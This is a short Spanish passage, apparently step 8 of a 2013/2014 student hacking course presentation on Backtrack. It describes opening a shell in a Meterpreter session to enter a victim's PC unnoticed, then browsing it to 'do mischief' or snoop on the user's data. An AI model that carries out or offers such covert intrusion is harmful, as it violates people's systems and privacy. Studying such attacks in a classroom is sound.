  • 8. Dentro del parámetro meterpreter, ponemos “Shell” para meternos dentro del PC de la víctima, sin que éste se dé cuenta de nada. Y como podemos ver, ya estamos dentro del Desktop de la víctima: A partir de ahora podemos navegar por el PC de la víctima y realizar maldades o simplemente ser un cotilla y ver toda la información que tiene el usuario. José Mª Vellido – ASIX2M Hacking Backtrack 1 – SEGDISP Fran Pérez – 2013/2014